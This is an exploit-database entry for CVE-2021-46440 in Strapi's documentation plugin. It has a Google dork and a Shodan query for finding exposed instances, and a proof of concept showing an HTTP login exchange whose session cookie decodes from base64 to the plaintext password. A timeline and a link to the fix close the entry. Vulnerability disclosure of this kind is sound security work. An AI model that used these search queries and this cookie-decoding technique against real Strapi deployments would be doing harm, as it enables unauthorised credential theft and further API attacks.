Exploit for Strapi 3.6.8 Password Disclosure / Insecure Handling CVE-2021-46440

Name: Exploit for Strapi 3.6.8 Password Disclosure / Insecure Handling CVE-2021-46440
Rating: 5 (231 reviews)
2022-05-02 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:166915
# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format  
# Google Dork: intitle:"Welcome to your Strapi ap"  
# Shodan search: "X-Powered-By: Strapi <strapi.io>"  
# Date: 2022-03-30  
# Exploit Author: Kitchaphan Singchai [idealphase]  
# Vendor Homepage: https://strapi.io/  
# Software Link: https://github.com/strapi/strapi/releases  
# Vulnerable Version: < 3.6.9 and < 4.1.5  
# Version: 3.6.8  
# Tested on: Linux  
# CVE: CVE-2021-46440  
  
# Description:  
Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.  
  
# This CVE has been fixed via this Github pull request.  
- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)  
  
# PoC:  
[Request]  
POST /documentation/login HTTP/1.1  
Host: 127.0.0.1:1337  
..[SNIP]..  
  
password=password  
  
[Response]  
HTTP/1.1 302 Found  
Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly  
Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly  
X-Powered-By: Strapi <strapi.io>  
..[SNIP]..  
  
Redirecting to <a href="/documentation">/documentation</a>.  
  
Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.  
{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}  
  
# Timeline:  
19/Jan/2022 - Inform vulnerability to Strapi team  
20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.  
8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)  
28/Mar/2022 - Reserved CVE-2021-46440  
29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]